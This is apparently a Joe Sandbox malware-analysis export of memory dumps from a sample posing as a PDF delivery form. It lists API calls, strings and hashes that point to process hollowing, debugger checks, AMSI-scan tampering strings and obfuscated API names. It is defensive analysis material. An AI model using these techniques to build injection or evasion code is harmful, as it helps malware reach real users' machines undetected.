Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1022112746-51457883
Opcode ID: 56badafe2a904b19fbef2b7f7cfa103169eddba6535aa1730e02b2893554d4af
Instruction ID: bfd46d06f1eb63b6db02e70e962cd4d84688b6ceea103092d750b7a24c8f7a83
Opcode Fuzzy Hash: 56badafe2a904b19fbef2b7f7cfa103169eddba6535aa1730e02b2893554d4af
Instruction Fuzzy Hash: 20E22A35A501189FDF25FBA4DD91ACE73BAEF88310F1141A1E24AAB214DB30EE46DF54

Function 02CE8BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB

Part of subcall function 02CE85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668

GetThreadContext.KERNEL32(00000864,02D31420,ScanString,02D313A4,02CEA77C,UacInitialize,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,UacInitialize,02D313A4), ref: 02CE9442

Part of subcall function 02CE8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5

Part of subcall function 02CE84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529

Part of subcall function 02CE79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27

Strings

BCryptQueryProviderRegistration, xrefs: 02CEA3C7
OpenSession, xrefs: 02CE8BE9, 02CE900C, 02CE90BE, 02CEA48F, 02CEA5D5
MiniDumpWriteDump, xrefs: 02CEA554
dbgcore, xrefs: 02CEA559, 02CEA56D
BCryptVerifySignature, xrefs: 02CEA3B3
UacScan, xrefs: 02CE8CB3, 02CE8ECB, 02CE94C7, 02CE98C3, 02CE9A37, 02CEA1E1, 02CEA679
UacInitialize, xrefs: 02CE8E72, 02CE91D3, 02CE9352, 02CE9456, 02CEA170
bcrypt, xrefs: 02CEA3B8, 02CEA3CC, 02CEA3E0
NtSetSecurityObject, xrefs: 02CEA6CF
ntdll, xrefs: 02CEA465, 02CEA479, 02CEA531, 02CEA6D4, 02CEA6E8
ScanString, xrefs: 02CE8C42, 02CE8DED, 02CE8F9B, 02CE93C3, 02CE95A9, 02CE9730, 02CE9BBD, 02CE9D7B, 02CE9EEB, 02CEA05E, 02CEA349, 02CEA3F6
NtOpenProcess, xrefs: 02CEA6E3
SLGetLicenseInformation, xrefs: 02CE919F
sppc, xrefs: 02CE91B6
NtOpenObjectAuditAlarm, xrefs: 02CEA474, 02CEA52C
I_QueryTagInformation, xrefs: 02CEA540
BCryptRegisterProvider, xrefs: 02CEA3DB
advapi32, xrefs: 02CEA545
Initialize, xrefs: 02CE8F2A, 02CE9538, 02CE96BF, 02CE9AA8, 02CE9D0A, 02CE9E7A, 02CE9FED, 02CEA252, 02CEA583
ScanBuffer, xrefs: 02CE8D0C, 02CE8D94, 02CE912F, 02CE9244, 02CE92E1, 02CE961A, 02CE97A1, 02CE9934, 02CE9B19, 02CE9C2E, 02CE9DEC, 02CE9F5C, 02CEA0CF, 02CEA2C3, 02CEA4E1, 02CEA627
MiniDumpReadDumpStream, xrefs: 02CEA568
NtReadVirtualMemory, xrefs: 02CEA460

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4113022151-51457883
Opcode ID: df01125b45f6ff1cb4b2b53b91da4a1dd067802bf2bdfa426e15c41cd6b4e5b4
Instruction ID: 31c5ea388e98a564e8f27ab9a4036db0e11e56ae39f6c1a17e5f7ac95f1d4d9c
Opcode Fuzzy Hash: df01125b45f6ff1cb4b2b53b91da4a1dd067802bf2bdfa426e15c41cd6b4e5b4
Instruction Fuzzy Hash: CEE22A35A501189FDF25FBA4DD91BCE73BAEF88310F1141A1E24AAB214DA30EE46DF54

Function 02CD5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CD5AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CD5B37
RegQueryValueExA.ADVAPI32(?,02CD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001), ref: 02CD5B55
RegCloseKey.ADVAPI32(?,02CD5B84,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CD5B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CD5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CD5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CD5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CD5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CD5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CD5C97

Strings

Software\Borland\Locales, xrefs: 02CD5AA8, 02CD5AC6
Software\Borland\Delphi\Locales, xrefs: 02CD5AE4

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 326a4e30e5433b299426ee85f6cac17587f6cbbf1f4ce6555f7780b39e3e56d1
Instruction ID: 3a45322690d10d2934f232a810b8b1b3eeac63d9b9e5f623f0bc390f47d930f3
Opcode Fuzzy Hash: 326a4e30e5433b299426ee85f6cac17587f6cbbf1f4ce6555f7780b39e3e56d1
Instruction Fuzzy Hash: 3351B5B1A4024C7EFB25D6E4CC46FEF77BD9B48784F8405A1A704E6180EBB49B448FA0

Function 02CE87A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A

Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74

Strings

BCryptVerifySignature, xrefs: 02CE87C7
bcrypt, xrefs: 02CE87B3

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: e640d20c7df79d3250fed4276570bfd3bb1e2e0f2e610e62426ed4f2e308687f
Instruction ID: 30a5df2cd09ec3051090c81c3161115190b36a48e54c00a5e129c3b3f30697b2
Opcode Fuzzy Hash: e640d20c7df79d3250fed4276570bfd3bb1e2e0f2e610e62426ed4f2e308687f
Instruction Fuzzy Hash: 66F0AF71A802156EEF109A68F944BB6339CA780354F00092AF58DC7740C7709C54CB50

Function 02CEEBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02CEEC00
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CEEC12
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CEEC29

Strings

CheckRemoteDebuggerPresent, xrefs: 02CEEC0C
KernelBase, xrefs: 02CEEBFB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 9e44b739081434541f47cfd71c43b64563a9275ac82a9d13008292a9d7237a5b
Instruction ID: 3831b39269fe67a5f797bc7d0753f6bc38d51599e8dab6d8ce77457106c81e40
Opcode Fuzzy Hash: 9e44b739081434541f47cfd71c43b64563a9275ac82a9d13008292a9d7237a5b
Instruction Fuzzy Hash: D1F0A07090468CAAEF22A7E898897DCFBAD6B05338F6803E4E426621C1E7750784C651

Function 02CEDBB0 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDBEB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDC1B
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CEDC30
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CEDC5C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CEDC65

Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: File$String$AllocCloseFreeInformationOpenQueryRead
String ID:
API String ID: 2659941336-0
Opcode ID: dc8618206aabc65ef0d83255fb88cb27b3832fb0cdcbbf7c314455dd7d3b6d6c
Instruction ID: 3ff6f463093ce4084ba1dc81f0632f1139759ac76d90ca12d3cbe5f67bf1e637
Opcode Fuzzy Hash: dc8618206aabc65ef0d83255fb88cb27b3832fb0cdcbbf7c314455dd7d3b6d6c
Instruction Fuzzy Hash: FB210071A50708BAEB15EAE4CC46FDEB7BDAB48B00F500561B701F71C0DBB4AA449BA5

Function 02CEE2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CEE436

Strings

ScanBuffer, xrefs: 02CEE37F
Initialize, xrefs: 02CEE326
OpenSession, xrefs: 02CEE3D8

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: feeb0ae463ed5a783e767f6e2b9b292a201d3e0d21e09e4009a51ca2c4838134
Instruction ID: 629a72739ee0463670307eb70b616c5f7f2c018772cf9dde11a635a99df7d4fd
Opcode Fuzzy Hash: feeb0ae463ed5a783e767f6e2b9b292a201d3e0d21e09e4009a51ca2c4838134
Instruction Fuzzy Hash: E241F135A502089BEF24EBE4CD81ADE73FAEF4C360F114435E646B7250DA74AD069F64

Function 02CEDACC Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: File$AllocCloseCreateStringWrite
String ID:
API String ID: 3308905243-0
Opcode ID: fd581705b5e84c5db3929f7c393db094522cb12367e04bfdbd54b104eb4af7dd
Instruction ID: f1156b05af507c2de4b8ba6dcd5eab5eaf2d319747c49f302a8674fe303095a6
Opcode Fuzzy Hash: fd581705b5e84c5db3929f7c393db094522cb12367e04bfdbd54b104eb4af7dd
Instruction Fuzzy Hash: BF21CA71E40308BAEB24EAE4CD46F9EB7BDAB44B04F604561B701F71D0D7B4AB049AA5

Function 02CE85DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668

Strings

CreateProcessAsUserW, xrefs: 02CE85F5
Kernel32, xrefs: 02CE8627

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 4d750e90e2d12ef2031d8b7cc36e67c582a6b027f5547807faa62f08778127c3
Instruction ID: 586fb3b488496aa72b9ed0a9b33400d1d4520a5552241becfa88845dc2a6c155
Opcode Fuzzy Hash: 4d750e90e2d12ef2031d8b7cc36e67c582a6b027f5547807faa62f08778127c3
Instruction Fuzzy Hash: 7011D3B5640208AFDB50DEA8DD41F9A37EDEB0C700F514624BA09E7650C634ED109B64

Function 02CE79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27

Strings

ntdll, xrefs: 02CE79FC
yromeMlautriVetacollAwZ, xrefs: 02CE79CF

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 84a923acbff155ca729148c55bd6811d24ad25b4008c9b9a64a90279b900dd59
Instruction ID: 09ba6e8c0fa371f9a06226423d39600fc6156796d9e4561f8c0b54dc3a5752a4
Opcode Fuzzy Hash: 84a923acbff155ca729148c55bd6811d24ad25b4008c9b9a64a90279b900dd59
Instruction Fuzzy Hash: B6112975640209AFEF14EFA4DC41EAEB7AEEB4C710F518874BA06D7640DA30EE15DB60

Function 02CE79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27

Strings

ntdll, xrefs: 02CE79FC
yromeMlautriVetacollAwZ, xrefs: 02CE79CF

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 6a6f979b1732c5d1ef093e49965bed6375298b8b18c76d7e2fcce49be83a6691
Instruction ID: 90eceebb13338434b2b2dfdd6c26a09ac3f7b79dce467a01766e6485e766685b
Opcode Fuzzy Hash: 6a6f979b1732c5d1ef093e49965bed6375298b8b18c76d7e2fcce49be83a6691
Instruction Fuzzy Hash: 26112975640209AFEF14EFA4DC41E9EB7AEEB4C710F518874BA06D7640DA30EA15DB60

